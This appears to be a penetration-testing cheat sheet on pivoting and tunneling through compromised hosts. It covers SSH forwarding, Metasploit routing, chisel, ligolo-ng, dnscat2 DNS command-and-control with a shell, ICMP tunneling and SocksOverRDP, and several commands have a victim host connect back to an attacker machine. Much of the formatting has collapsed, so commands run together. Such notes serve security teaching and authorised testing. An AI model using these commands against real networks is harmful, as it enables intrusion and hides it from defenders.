Pivoting & Tunneling
Pivoting is moving to other networks through a compromised host to find multiple targets on different network segments and Tunneling is the obfuscation of our actions to avoid detection.
SSH
client: Where the ssh command is executed.
server: Target of the ssh connection.
Allows a local client port to be mapped to another port on a certain target reachable by the server.
ssh -N -L <C_PORT>:<S_TRAGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>(possible to repeat multiple times -L for multiple ports)
Allows a local client port to be mapped to the server. That port will be used as a proxy socks, so packets passing through that port will leave from the server.
ssh -N -D <C_PORT> <S_USER>@<S_IP>vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>sudo proxychains[4] <COMMAND> (ex.. nmap, msfconsole)
Allows a port on the server to be mapped to another port on a target reachable by the client.
ssh -N -R <S_PORT>:<C_TRAGET_IP>:<C_TARGET_PORT> <S_USER>@<S_IP>Allows a server port to be mapped to the client. That port will be used as a proxy socks, so packets passing through that port will leave from the client.
ssh -N -R <S_PORT> <S_USER>@<S_IP>-N: Without the ability to execute remote commands.
0.0.0.0: All interface.
Metasploit
Pivoting only inside metasploit. Maps reaching other subnets via meterpreter sessions (via victim hosts).
post/multi/manage/autoroute # set network and sessionOr
route add <NETWORK> <SESSION>Or, in Meterpreter:
run autoroute -s <NETWORK>Pivoting for tools outside metasploit. Allows a local port to be mapped to metasploit. That port will be used as a proxy socks, so packets passing through that port will be handled by the route paths defined in metasploit.
# Set Routeauxiliary/server/socks_proxy # set vSocks 4a or 5 and PORTvim etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>sudo proxychains[4] <COMMAND>(ex. nmap)
In meterpreter you can define both a Local and a Remote port forwarding (see above ssh).
Local
portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TRAGET_IP>Remote
portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TRAGET_IP>Other
Simple Port Forwarding (single-host)
Define the listening port and the destination to rebroadcast to.
socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>Define the listening port and the destination to rebroadcast to. Requires administrator privileges.
netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>To view
netsh.exe interface portproxy show v4tov4It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.
sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK> <COMMAND_TO_NETWORK> NO proxychains, but root on the SSH client and Python3 on the SSH server.
On Windows before OpenSSH, PuTTY and its command-line-only counterpart Plink were used. Plink has much of the functionality offered by ssh.
plink.exe -ssh -R <PORT>:<IP>:<PORT> <USER>@<IP>plink.exe -ssh -D 9050 <USER>@<IP>Download Proxifier, portable version (like proxychains but for windows).
Set new proxy server socks5 to 127.0.0.1:9050
<COMMAND>If we cannot interact with the running shell:
-pw # specify password from commandcmd.exe /c echo y | plink.exe -ssh ... # via pipingTunneling
apt install ligolo-ngProxy on Attacker machine. Agent on Victim machine.
sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > helpConnect the victim to the server
> sessions
> autorouteConnect to the attacker server
./agent.exe -connect <ATTACKER_IP>:<ATTACKER_PORT> -ignore-certPROXY --> AGENT1 --> AGENT2 --> ?
You can listen to ports on the agent and redirect connections to your control/proxy server.
listener_add --addr <AGENT_IP>:<AGENT_PORT> --to <PROXY_IP>:<PROXY_PORT> --tcp> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcpUseful when we need to set up a reverse shell or something else from the second target (AGENT2) in the network that is not directly reachable.
If we want to do another pivoting from the second target machine (AGENT2), we just need to load the agent, reconnect to the proxy server via the set listener, set new tun (ex. ligolo2) and add routing (see here).
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
It performs TCP/UDP pivoting and tunneling, transported over HTTP and encrypted internally via SSH. Being hidden under HTTP it can bypass some restrictions.
On Attacker
chisel server -p <PORT> --reverse --socks5 On Target
chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]<REMOTE>:
<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>R:<S_IP>:<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT>[R:]<PORT>:<PORT>[R:]<PORT>:socksAdd the port in proxychains
vim /etc/proxychains[4].conf
socks5 127.0.0.1 <PORT>proxychains[4] <COMMAND>DNS-based encrypted command-and-control channel. A dnscat2 server runs on an authoritative name server for a particular domain (or as in our case a dummy dns server is created) while the client, configured to run queries on that domain, runs on the compromised machine.
On Attacker (Server)
sudo apt install dnscat2sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# Memorize secret <SECRET>On Target (Client)
Download compiled from HERE
./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>Or with Windows PowerShell Script
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmdOnce connected, from Attacker
?
<COMMAND> --help
windows # see connections ID
window -i <ID> # shellCommunication channel encapsulated in ICMP packets. Requires administrator privileges.
Installation
.exefor Windows HERE
git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd srcOn Target (Server)
sudo ./ptunnel-ng -r<SERVER_IP> -R22On Attacker (Client)
sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22ssh -p2222 -l<USER> <IP>ssh -D 9050 -p2222 -l<USER> 127.0.0.1vim /etc/proxychains[4].conf
# socks4 127.0.0.1 9050sudo proxychains[4] <COMMAND>
sudo proxychains[4] nmap <TARGET_IP_FROM_SERVER>Allows tunnelling and pivoting between Windows systems via RDP. Requires administrator privileges.
On Attacker (Client), with System PowerShell
regsvr32.exe SocksOverRDP-Plugin.dllmstsc.exe # Connect on target1Download Proxifier, portable version (like proxychains but for windows).
Set new proxy server socks5 to 127.0.0.1:1080
On Target1, with System PowerShell
SocksOverRDP-Server.exeOn Attacker
mstsc.exe # Connect on target1 via Target1 pivotingWarning
With proxychains only full TCP connect scan (
nmap -sT)Windows Defender blocks ICMP, traditional ping (
nmap -Pn)
Last updated
Was this helpful?